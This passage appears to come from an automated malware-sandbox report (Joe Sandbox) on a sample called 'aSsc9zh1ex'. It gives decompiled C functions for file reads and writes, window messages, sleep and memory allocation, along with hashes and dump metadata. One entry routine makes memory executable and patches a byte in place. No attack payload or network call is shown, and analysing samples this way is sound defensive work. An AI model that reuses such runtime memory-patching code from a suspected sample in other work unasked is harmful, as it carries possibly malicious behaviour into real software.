                                                                                                                              • ReadFile.KERNELBASE(00000000), ref: 6F002C57
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.41989007349.000000006F001000.00000020.00000001.01000000.00000004.sdmp, Offset: 6F000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.41988874344.000000006F000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41989151475.000000006F004000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41989215917.000000006F006000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_6f000000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: FileRead
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2738559852-0
                                                                                                                              • Opcode ID: 2344e3aa056c0e4a11b2a7ee97ccede3f905f2732c51b2f48688faccb7ac4525
                                                                                                                              • Instruction ID: 8bccd6a5730ad0dbc28aa3950328c1fcabafbf5c9e1dcdab08844331861d5516
                                                                                                                              • Opcode Fuzzy Hash: 2344e3aa056c0e4a11b2a7ee97ccede3f905f2732c51b2f48688faccb7ac4525
                                                                                                                              • Instruction Fuzzy Hash: C8419475500B04EFFF10BF68DD85B6E77B4EB46328F60842AE904C7140D738A9A4AFA5
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0040608D Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 100%
                                                                                                                              			E0040608D(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                                                                                                                              0x00406091
                                                                                                                              0x004060a1
                                                                                                                              0x004060a9
                                                                                                                              0x00000000
                                                                                                                              0x004060b0
                                                                                                                              0x00000000
                                                                                                                              0x004060b2

                                                                                                                              APIs
                                                                                                                              • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034BF,00000000,00000000,00403306,000000FF,00000004,00000000,00000000,00000000), ref: 004060A1
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.41959952306.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.41959904662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41960027525.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41960080093.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961705865.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961753112.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961803590.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961843116.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962021828.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962062973.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962107808.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962161287.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962210692.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962256309.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962332064.00000000007D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: FileRead
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2738559852-0
                                                                                                                              • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                                                                                              • Instruction ID: 9ce5220da9ed3c49ab8c05536da5923326b58a2142fda2ae973167115508ceb5
                                                                                                                              • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                                                                                              • Instruction Fuzzy Hash: 2DE08632140259ABCF119E518C00AEB376CFB05350F018472F911E2240D630E82187A5
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 004060BC Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 100%
                                                                                                                              			E004060BC(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                                                                                                                              0x004060c0
                                                                                                                              0x004060d0
                                                                                                                              0x004060d8
                                                                                                                              0x00000000
                                                                                                                              0x004060df
                                                                                                                              0x00000000
                                                                                                                              0x004060e1

                                                                                                                              APIs
                                                                                                                              • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403475,00000000,00793700,000000FF,00793700,000000FF,000000FF,00000004,00000000), ref: 004060D0
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.41959952306.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.41959904662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41960027525.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41960080093.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961705865.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961753112.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961803590.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961843116.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962021828.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962062973.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962107808.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962161287.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962210692.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962256309.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962332064.00000000007D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: FileWrite
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3934441357-0
                                                                                                                              • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                                                                              • Instruction ID: ff7f98053b8daf8dc00d9e724bd7773b369301681fd057c4f0a19a08aea0fefc
                                                                                                                              • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                                                                              • Instruction Fuzzy Hash: AEE0EC3225426AABDF10AF659C00AEB7BACFB15360F018437FA56E3190D631E83197A4
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 6F002A7F Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 100%
                                                                                                                              			_entry_(intOrPtr _a4, intOrPtr _a8) {

				 *0x6f005048 = _a4;
				if(_a8 == 1) {
					VirtualProtect(0x6f00505c, 4, 0x40, 0x6f00504c); // executed
					 *0x6f00505c = 0xc2;
					 *0x6f00504c = 0;
					 *0x6f005054 = 0;
					 *0x6f005068 = 0;
					 *0x6f005058 = 0;
					 *0x6f005050 = 0;
					 *0x6f005060 = 0;
					 *0x6f00505e = 0;
				}
				return 1;
			}



                                                                                                                              0x6f002a88
                                                                                                                              0x6f002a8d
                                                                                                                              0x6f002a9d
                                                                                                                              0x6f002aa5
                                                                                                                              0x6f002aac
                                                                                                                              0x6f002ab1
                                                                                                                              0x6f002ab6
                                                                                                                              0x6f002abb
                                                                                                                              0x6f002ac0
                                                                                                                              0x6f002ac5
                                                                                                                              0x6f002aca
                                                                                                                              0x6f002aca
                                                                                                                              0x6f002ad2

                                                                                                                              APIs
                                                                                                                              • VirtualProtect.KERNELBASE(6F00505C,00000004,00000040,6F00504C), ref: 6F002A9D
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.41989007349.000000006F001000.00000020.00000001.01000000.00000004.sdmp, Offset: 6F000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.41988874344.000000006F000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41989151475.000000006F004000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41989215917.000000006F006000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_6f000000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ProtectVirtual
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 544645111-0
                                                                                                                              • Opcode ID: d8e75e2a6e2d13bf55d6d77981553d735051bcc879c6f07ca08e39ad1d6a4a5d
                                                                                                                              • Instruction ID: a09d4aff369c05ed9dd29734fd12978faa2ead1dfaaa788ddf0bdc588b266265
                                                                                                                              • Opcode Fuzzy Hash: d8e75e2a6e2d13bf55d6d77981553d735051bcc879c6f07ca08e39ad1d6a4a5d
                                                                                                                              • Instruction Fuzzy Hash: 05F092B8505F80DEEB50DF2C8C4472E3BE0B71A325B14852EE248D6240E3344464EF99
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 004044C2 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 100%
                                                                                                                              			E004044C2(int _a4) {
				struct HWND__* _t2;
				long _t3;

				_t2 =  *0x7a7a38;
				if(_t2 != 0) {
					_t3 = SendMessageW(_t2, _a4, 0, 0); // executed
					return _t3;
				}
				return _t2;
			}





                                                                                                                              0x004044c2
                                                                                                                              0x004044c9
                                                                                                                              0x004044d4
                                                                                                                              0x00000000
                                                                                                                              0x004044d4
                                                                                                                              0x004044da

                                                                                                                              APIs
                                                                                                                              • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044D4
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.41959952306.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.41959904662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41960027525.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41960080093.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961705865.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961753112.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961803590.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961843116.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962021828.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962062973.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962107808.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962161287.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962210692.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962256309.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962332064.00000000007D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3850602802-0
                                                                                                                              • Opcode ID: 749224e8f98fb78827d13f0d237c1790e640dc60b1af624d5aad8e7e956e5cea
                                                                                                                              • Instruction ID: ac3b44bde4cff7d728b8f73da7dc3c4418e617d20a2d9e9616a9aba5531653cc
                                                                                                                              • Opcode Fuzzy Hash: 749224e8f98fb78827d13f0d237c1790e640dc60b1af624d5aad8e7e956e5cea
                                                                                                                              • Instruction Fuzzy Hash: 4FC04C75744600BAEA148F549E45F0677546790701F14C429B641B54D0CA74D410DA2C
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 004034C2 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 100%
                                                                                                                              			E004034C2(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
				return _t2;
			}




                                                                                                                              0x004034d0
                                                                                                                              0x004034d6

                                                                                                                              APIs
                                                                                                                              • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403242,?,?,?,?,?,?,0040385A,?), ref: 004034D0
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.41959952306.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.41959904662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41960027525.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41960080093.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961705865.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961753112.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961803590.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961843116.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962021828.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962062973.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962107808.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962161287.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962210692.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962256309.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962332064.00000000007D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: FilePointer
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 973152223-0
                                                                                                                              • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                                                                                              • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
                                                                                                                              • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                                                                                              • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 004044AB Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 100%
                                                                                                                              			E004044AB(int _a4) {
				long _t2;

				_t2 = SendMessageW( *0x7a8a68, 0x28, _a4, 1); // executed
				return _t2;
			}




                                                                                                                              0x004044b9
                                                                                                                              0x004044bf

                                                                                                                              APIs
                                                                                                                              • SendMessageW.USER32(00000028,?,00000001,004042D6), ref: 004044B9
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.41959952306.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.41959904662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41960027525.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41960080093.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961705865.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961753112.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961803590.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961843116.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962021828.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962062973.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962107808.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962161287.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962210692.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962256309.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962332064.00000000007D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3850602802-0
                                                                                                                              • Opcode ID: 33429e90f145919918c0f5a16300b6ae2cb664e9c61a266d81822a9c1fb78e21
                                                                                                                              • Instruction ID: 9ccc480ae856a8f761d654a46a9a0801f91457f8e33b58f107ae6609e89c6df3
                                                                                                                              • Opcode Fuzzy Hash: 33429e90f145919918c0f5a16300b6ae2cb664e9c61a266d81822a9c1fb78e21
                                                                                                                              • Instruction Fuzzy Hash: 51B09235181A00AADE914B00DE09F457A62A7A4701F00C029B241240B4CAB200A4DB0A
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00404498 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 100%
                                                                                                                              			E00404498(int _a4) {
				int _t2;

				_t2 = EnableWindow( *0x7a1f44, _a4); // executed
				return _t2;
			}




                                                                                                                              0x004044a2
                                                                                                                              0x004044a8

                                                                                                                              APIs
                                                                                                                              • KiUserCallbackDispatcher.NTDLL(?,0040426F), ref: 004044A2
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.41959952306.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.41959904662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41960027525.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41960080093.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961705865.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961753112.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961803590.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961843116.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962021828.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962062973.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962107808.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962161287.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962210692.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962256309.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962332064.00000000007D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CallbackDispatcherUser
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2492992576-0
                                                                                                                              • Opcode ID: fb2bbd85db119072699d8509dbb0c67ddc0fed6d182cd9e62e167e16add427de
                                                                                                                              • Instruction ID: f32ebe17383345fd09930a0b12515434b8b37a693fa3d318b2a69664ac7713bd
                                                                                                                              • Opcode Fuzzy Hash: fb2bbd85db119072699d8509dbb0c67ddc0fed6d182cd9e62e167e16add427de
                                                                                                                              • Instruction Fuzzy Hash: 97A00176405540AFEE029B61EF09D4ABB72ABA9701B4185B9A286A0034CB364860EB1D
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 004014D7 Relevance: 1.3, APIs: 1, Instructions: 19sleepCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 100%
                                                                                                                              			E004014D7(intOrPtr __edx) {
				long _t3;
				void* _t7;
				intOrPtr _t10;
				void* _t13;

				_t10 = __edx;
				_t3 = E00402D84(_t7);
				 *((intOrPtr*)(_t13 - 0x10)) = _t10;
				if(_t3 <= 1) {
					_t3 = 1;
				}
				Sleep(_t3); // executed
				 *0x7a8ae8 =  *0x7a8ae8 +  *((intOrPtr*)(_t13 - 4));
				return 0;
			}







                                                                                                                              0x004014d7
                                                                                                                              0x004014d8
                                                                                                                              0x004014e1
                                                                                                                              0x004014e4
                                                                                                                              0x004014e8
                                                                                                                              0x004014e8
                                                                                                                              0x004014ea
                                                                                                                              0x00402c2d
                                                                                                                              0x00402c39

                                                                                                                              APIs
                                                                                                                              • Sleep.KERNELBASE(00000000), ref: 004014EA
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.41959952306.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.41959904662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41960027525.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41960080093.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961705865.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961753112.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961803590.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961843116.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962021828.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962062973.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962107808.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962161287.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962210692.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962256309.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962332064.00000000007D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Sleep
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3472027048-0
                                                                                                                              • Opcode ID: 37e8cdb3e959b6eccc3643533ee898bd9fefd3c7d67a49354a1a021ca5fec273
                                                                                                                              • Instruction ID: 3b5dc4dfeaf44569f9deb2ecf0de9c371932af0cf72a0f4646a25a2108455337
                                                                                                                              • Opcode Fuzzy Hash: 37e8cdb3e959b6eccc3643533ee898bd9fefd3c7d67a49354a1a021ca5fec273
                                                                                                                              • Instruction Fuzzy Hash: E0D05E73A141018BD704EBB8BE8545E73A8EB503193208C37D402E1091EA7888564618
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 6F0012BB Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 100%
                                                                                                                              			E6F0012BB() {
				void* _t3;

				_t3 = GlobalAlloc(0x40,  *0x6f00506c +  *0x6f00506c); // executed
				return _t3;
			}




                                                                                                                              0x6f0012c5
                                                                                                                              0x6f0012cb

                                                                                                                              APIs
                                                                                                                              • GlobalAlloc.KERNELBASE(00000040,?,6F0012DB,?,6F00137F,00000019,6F0011CA,-000000A0), ref: 6F0012C5
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.41989007349.000000006F001000.00000020.00000001.01000000.00000004.sdmp, Offset: 6F000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.41988874344.000000006F000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41989151475.000000006F004000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41989215917.000000006F006000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_6f000000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AllocGlobal
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3761449716-0
                                                                                                                              • Opcode ID: 80e678431bf3c0718360f1b642abe35419f3a5e2b0c65057c98cd43fe60e13c3
                                                                                                                              • Instruction ID: 72c6e85cfe774474e9657dce7c1cdfb2d7ca126715940033e3559dc1517935e9
                                                                                                                              • Opcode Fuzzy Hash: 80e678431bf3c0718360f1b642abe35419f3a5e2b0c65057c98cd43fe60e13c3
                                                                                                                              • Instruction Fuzzy Hash: 74B01274A00400EFFF008B68CD0AF3C3254F701311F044004F600D0180C1704C30953C
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Non-executed Functions

